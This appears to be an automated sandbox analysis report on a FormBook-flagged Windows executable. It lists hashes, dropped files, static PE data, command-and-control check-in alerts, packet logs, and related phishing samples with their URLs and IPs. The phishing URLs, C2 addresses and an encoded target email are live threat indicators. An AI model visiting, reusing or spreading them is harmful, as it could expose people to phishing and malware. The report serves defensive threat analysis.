                                                              https://docs.google.com/drawings/d/1XTtg4o4D3rVDatT-1eTIZjr2WQ95puAA8jccViOFGvQ/preview?jv22tGet hashmaliciousUnknownBrowse
                                                              • 162.240.156.181
                                                              https://www.google.com/url?q=https://www.google.com/url?q%3DdCSMjVnvsqsqaP8pEWWm%26rct%3DSpPq9HncUaCXUtCZusX0%26sa%3Dt%26esrc%3DuZR6jk9A67Rj7RZhLuPE%26source%3D%26cd%3Deh0xIKCKpKh7i4kTt26p%26cad%3DVEVtMkQKVNr1KW4fxShi%26ved%3DNTDACygNXetEDbRT8YiY%26uact%3D%2520%26url%3Damp%252Fne%C2%ADby%C2%ADco%C2%ADm%E2%80%8B.%C2%ADc%C2%ADo%C2%ADm%E2%80%8B/dayo/iAlZHZ/ZGF2aWQuai5tZWxzbmVzc0B4Y2VsZW5lcmd5LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                              • 162.240.102.206
                                                              SUSPECT-Caller left VM MSG 000130 DURATION-130d59604ceef43a4732c50b34e3444d (23.1 KB).msgGet hashmaliciousPhisherBrowse
                                                              • 192.185.13.186
                                                              Play_VM-Now(Gracehealthmi)CLQD.htmlGet hashmaliciousUnknownBrowse
                                                              • 162.241.24.122
                                                              Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646fGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                              • 69.49.245.172
                                                              Play____Now(Stewart.b)a2f1c0d5349d3a3f5a8836dc306214787325a135.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 69.49.245.172
                                                              Play____Now(Stewart.b)a2f1c0d5349d3a3f5a8836dc306214787325a135.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 69.49.245.172
                                                              https://url.za.m.mimecastprotect.com/s/0BCLC2RJJxsopvqJcnfRC5V8Fi?domain=form.asana.comGet hashmaliciousUnknownBrowse
                                                              • 50.87.253.62
                                                              ACPCA8097600987765.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.72
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.94
                                                              QOaboeP8al.exeGet hashmaliciousDarkCloudBrowse
                                                              • 162.55.60.2
                                                              Request for Quotataion.exeGet hashmaliciousDarkCloudBrowse
                                                              • 162.55.60.2
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.94
                                                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.94
                                                              Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousPhisherBrowse
                                                              • 162.0.217.108
                                                              Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 162.0.217.108
                                                              Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 162.0.217.108
                                                              Factura de proforma.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                              • 162.0.213.72

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\r9856_7.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\r9856_7.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):2232
                                                              Entropy (8bit):5.379736180876081
                                                              Encrypted:false
                                                              SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:tLHyIFKL3IZ2KRH9Oug8s
                                                              MD5:AE33CC731D64A142DFCC6A541D0708FC
                                                              SHA1:31B0ECD28CA8892C3EF4B42D1CB1F56BECD14BEA
                                                              SHA-256:776FC4031835093845318CEABF43AB13C51EC6CA69B985C45049EAE2EB6AF623
                                                              SHA-512:5282E64561D28CB77C92089BEAF27D83EC55B2A673BEF6EAB4DFC49BE61A0F6653E73F07A45AFBF93C407546D04BB50D9690CCBF553227A4E6CFE4F98389C211
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                              C:\Users\user\AppData\Local\Temp\267_8V0-3

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\cmdkey.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                              Category:modified
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.1215420383712111
                                                              Encrypted:false
                                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw53lp0l.1lv.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hql5d3r2.poo.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ib0t2l1x.tpu.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikzqvzee.xpd.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.852357656519757
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:r9856_7.exe
                                                              File size:712'192 bytes
                                                              MD5:6abb344635c64e538866f0e7386e2568
                                                              SHA1:072c594929e33401604f6e4f184f2ed78b4e38c2
                                                              SHA256:a5273ce78432a8f34e120ecd96da8681ece96ce8b54cc6eec68c0088c483b8ec
                                                              SHA512:eb02a89ec96410c5f96b03d2222ce2f1553a90e763d09f0f08a26e9e2e98089b31f4526273797b5631260250e00e40e1529618eba1b4458f7b1873cf286ef923
                                                              SSDEEP:12288:XO0WTavnxRpFrt/0hi9cDoxsxrHWpH6MMGD1TmWqSokzT9i72l:DWGpRTrii9ccx4r2t6MMGD1crIkE
                                                              TLSH:C0E41269A629C811E95843380671C3B14B3D7F9AE111D30B8FEFACF77856378B924792
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~U...............0.............".... ........@.. .......................@............@................................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4af022
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0xD9557E98 [Wed Jul 18 01:40:40 2085 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xaefcf0x4f.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x64c.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xad0640x70.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xad0280xad200458e283e45bc05eeb264b548ce56e3d3False0.9282519178700361data7.8614274357019545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xb00000x64c0x80005971ead7fb3ed00ac1e62bc52bae025False0.33984375data3.500453359649115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xb20000xc0x200b188ab4c732a131282eaf03796cf7e59False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0xb00900x3bcdata0.4110878661087866
                                                              RT_MANIFEST0xb045c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-09-11T22:54:47.970266+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759660154.23.184.21880TCP
                                                              2024-09-11T22:55:11.746854+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759665152.53.38.080TCP
                                                              2024-09-11T22:55:25.554231+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75966923.225.34.7580TCP
                                                              2024-09-11T22:55:38.710839+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.7596733.33.130.19080TCP
                                                              2024-09-11T22:55:52.282540+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75967765.108.194.4980TCP
                                                              2024-09-11T22:56:06.275752+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759681208.91.197.1380TCP
                                                              2024-09-11T22:56:20.096078+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75968576.223.113.16180TCP
                                                              2024-09-11T22:56:33.495089+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759689172.67.221.580TCP
                                                              2024-09-11T22:56:47.204569+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759693162.240.81.1880TCP
                                                              2024-09-11T22:57:00.498635+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759697162.0.213.9480TCP
                                                              2024-09-11T22:57:13.948673+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75970184.32.84.3280TCP
                                                              2024-09-11T22:57:27.510291+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75970535.214.33.20480TCP
                                                              2024-09-11T22:57:40.658093+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.7597093.33.130.19080TCP
                                                              2024-09-11T22:57:54.255424+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759713199.59.243.22680TCP
                                                              2024-09-11T22:58:16.140788+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759717188.114.96.380TCP
                                                              2024-09-11T22:58:25.786115+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759718154.23.184.21880TCP
                                                              2024-09-11T22:58:38.909718+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.759722152.53.38.080TCP
                                                              2024-09-11T22:58:52.842736+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75972623.225.34.7580TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 11, 2024 22:54:47.057032108 CEST5966080192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:54:47.065192938 CEST8059660154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:54:47.065399885 CEST5966080192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:54:47.076656103 CEST5966080192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:54:47.083765030 CEST8059660154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:54:47.969984055 CEST8059660154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:54:47.970004082 CEST8059660154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:54:47.970266104 CEST5966080192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:54:47.973777056 CEST5966080192.168.2.7154.23.184.218
                                                              Sep 11, 2024 22:54:47.978722095 CEST8059660154.23.184.218192.168.2.7
                                                              Sep 11, 2024 22:55:03.607429028 CEST5966180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:03.613754988 CEST8059661152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:03.613866091 CEST5966180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:03.631483078 CEST5966180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:03.636372089 CEST8059661152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:04.090749025 CEST8059661152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:04.090867043 CEST8059661152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:04.091001987 CEST8059661152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:04.091063976 CEST5966180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:04.091101885 CEST5966180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:05.143085957 CEST5966180192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:06.161319017 CEST5966280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:06.166280031 CEST8059662152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:06.166380882 CEST5966280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:06.177545071 CEST5966280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:06.182528019 CEST8059662152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:06.622433901 CEST8059662152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:06.622704029 CEST8059662152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:06.622888088 CEST5966280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:06.622906923 CEST8059662152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:06.622968912 CEST5966280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:07.690416098 CEST5966280192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:08.708957911 CEST5966380192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:08.714027882 CEST8059663152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:08.714123964 CEST5966380192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:08.729110956 CEST5966380192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:08.734005928 CEST8059663152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:08.734061956 CEST8059663152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:09.182925940 CEST8059663152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:09.183037996 CEST8059663152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:09.183092117 CEST5966380192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:10.236701965 CEST5966380192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:11.256567001 CEST5966580192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:11.261668921 CEST8059665152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:11.261780977 CEST5966580192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:11.268712044 CEST5966580192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:11.273642063 CEST8059665152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:11.746623993 CEST8059665152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:11.746649981 CEST8059665152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:11.746666908 CEST8059665152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:11.746854067 CEST5966580192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:11.749407053 CEST5966580192.168.2.7152.53.38.0
                                                              Sep 11, 2024 22:55:11.754209995 CEST8059665152.53.38.0192.168.2.7
                                                              Sep 11, 2024 22:55:17.284986973 CEST5966680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:17.289938927 CEST805966623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:17.290033102 CEST5966680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:17.300864935 CEST5966680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:17.305650949 CEST805966623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:17.898739100 CEST805966623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:17.899066925 CEST805966623.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:17.899317980 CEST5966680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:18.814774990 CEST5966680192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:19.833379030 CEST5966780192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:19.838327885 CEST805966723.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:19.838449955 CEST5966780192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:19.848762035 CEST5966780192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:19.854907036 CEST805966723.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:21.072299004 CEST805966723.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:21.072343111 CEST805966723.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:21.072484970 CEST5966780192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:21.362016916 CEST5966780192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:22.381493092 CEST5966880192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:22.386456966 CEST805966823.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:22.386557102 CEST5966880192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:22.396318913 CEST5966880192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:22.401231050 CEST805966823.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:22.401251078 CEST805966823.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:22.976957083 CEST805966823.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:22.976999998 CEST805966823.225.34.75192.168.2.7
                                                              Sep 11, 2024 22:55:22.977168083 CEST5966880192.168.2.723.225.34.75
                                                              Sep 11, 2024 22:55:23.908679962 CEST5966880192.168.2.723.225.34.75
